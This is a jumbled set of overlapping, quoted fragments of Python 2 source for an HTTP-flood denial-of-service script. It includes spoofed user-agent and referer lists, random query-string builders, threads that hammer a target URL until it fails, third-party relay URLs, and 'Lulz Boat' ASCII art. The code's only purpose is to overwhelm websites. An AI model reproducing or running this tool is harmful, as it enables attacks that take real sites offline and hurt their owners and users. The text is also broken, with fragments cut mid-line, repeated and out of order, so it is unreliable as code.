headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36", "v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U;", "Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines", "requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print", "6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET", "Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K)", "headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler;", "Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia", "i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def", "/-._; | : : :: ,. . ,' :: /`-._| | | ||", "Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ", "headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1;", "U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML,", ".NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')", "// //~ // // ~~ _// _// _// ~ _// ~ ~ /", "NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38)", "keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ", "Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android", "4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)')", "set_flag(2) except Exception, ex: pass # monitors http threads and counts requests class", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML,", "headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for", "U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0')", "headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3;", "4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0", ";|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_", "NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0)", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "`| : `' ,' `. / |`-:_ ; | | | : \\", "referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner +", "headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)')", "OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)", "v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)')", "(compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10", "headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler;", "(<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1", "headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)')", "headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')", "headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0", ";|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------'", "headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org;", "Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator", "(http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web", "C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global", "| : O ._O O_. O ._O O_. ; ; : `. //", ",' `. / |`-:_ ; | | | : \\ `--. ) /|-._:", "(KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)')", "( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27')", "240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U;", "headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx", "(KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible;", "like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net)", "en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1;", "bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str =", "like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36')", "Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "(AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google;", "isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02)", "(KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36", "MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC;", "headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0", ":: ,. . ,' :: /`-._| | | || ' : `.`.) _,'", "// ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~", "/ ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~ _// ~", "headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0)", "headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0", "headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)')", "headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt", "(http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)')", "4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array", "keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele')", "headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser", "headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4;", "set_safe(): global safe safe=1 # generates a user agent array def useragent_list(): global", "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global", "http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy", "(v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80", "(Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)", "http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')", "http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika", "240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux", "4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591')", "global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\")", "4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0", "if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host =", "def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception,", "UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')", "HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except", "6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64)", "search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com;", "dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0", "~ / / / / / / / / ~ ~~ ~~~ ~~~", "Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')", "#execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else:", "if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url =", "keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3')", "(Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1", "Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0", "4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "#http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800)", "_.--| LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat", "Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows;", "urllib2 import sys import threading import random import re #global params url='' host=''", "Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0", "(Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0", "5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')", "<EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV", ")') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.')", "LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined", "// `:`. ,' \\ /-._; | : : :: ,. . ,' ::", "Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824", "flag=val def set_safe(): global safe safe=1 # generates a user agent array def", "(web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx')", "Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7", "NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0')", "dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot')", "1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10')", "3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML", "(+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine", "xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U;", "(KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML,", "headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10", "(Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1", "powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker", "1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14", "url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for", "crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1", "(Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible;", "NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; 